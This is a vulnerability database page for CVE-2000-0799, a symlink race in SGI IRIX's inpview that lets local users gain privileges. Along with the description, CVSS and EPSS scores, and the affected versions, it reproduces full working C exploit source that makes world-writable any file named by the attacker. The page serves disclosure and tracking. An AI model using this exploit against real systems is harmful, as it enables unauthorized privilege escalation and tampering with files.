CVE-2000-0799 : Detail

CVE-2000-0799

0.04%V3
Local
2001-09-18
02h00 +00:00
2005-11-02
09h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

inpview in InPerson in SGI IRIX 5.3 through IRIX 6.5.10 allows local users to gain privileges via a symlink attack on the .ilmpAAA temporary file.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 3.7 AV:L/AC:H/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 20130

Publication date : 1999-12-31 23h00 +00:00
Author : Last Stage of Delirium
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/1530/info Certain versions of IRIX ship with a version of inpview that creates files in '/var/tmp/' in an insecure manner and is therefore prone to a race condition. InPerson's 'inpview' is a networked multimedia conferencing tool. InPerson provides multiway audio and video conferencing with a shared whiteboard, combined into a single, easy-to-use application. You use a separate "phone" tool to place and answer calls. The 'inpview' program writes out temporary files in the '/var/tmp' directory. Because these filenames are not random, an attacker can create a symlink to a previously created filename and force the SUID 'inpview' to overwrite the file with 'rw-rw-rw' permissions. */ /*## copyright LAST STAGE OF DELIRIUM jan 2000 poland *://lsd-pl.net/ #*/ /*## /usr/lib/InPerson/inpview #*/ /* sets rw-rw-rw permissions */ #include <sys/types.h> #include <dirent.h> #include <stdio.h> main(int argc,char **argv){ DIR *dirp;struct dirent *dentp; printf("copyright LAST STAGE OF DELIRIUM jan 2000 poland //lsd-pl.net/\n"); printf("/usr/lib/InPerson/inpview for irix 6.5 6.5.8 IP:all\n\n"); if(argc!=2){ printf("usage: %s file\n",argv[0]); exit(-1); } if(!fork()){ nice(-20);sleep(2);close(0);close(1);close(2); execle("/usr/lib/InPerson/inpview","lsd",0,0); } printf("looking for temporary file... ");fflush(stdout); chdir("/var/tmp"); dirp=opendir("."); while(1){ if((dentp=readdir(dirp))==NULL) {rewinddir(dirp);continue;} if(!strncmp(dentp->d_name,".ilmpAAA",8)) break; } closedir(dirp); printf("found!\n"); while(1){ if(!symlink(argv[1],dentp->d_name)) break; } sleep(2); unlink(dentp->d_name); execl("/bin/ls","ls","-l",argv[1],0); }

Products Mentioned

Configuraton 0

Sgi>>Irix >> Version 6.5

Sgi>>Irix >> Version 6.5.1

Sgi>>Irix >> Version 6.5.2m

Sgi>>Irix >> Version 6.5.3

Sgi>>Irix >> Version 6.5.3f

Sgi>>Irix >> Version 6.5.3m

Sgi>>Irix >> Version 6.5.4

Sgi>>Irix >> Version 6.5.6

Sgi>>Irix >> Version 6.5.7

Sgi>>Irix >> Version 6.5.8

References

http://www.securityfocus.com/bid/1530
Tags : vdb-entry, x_refsource_BID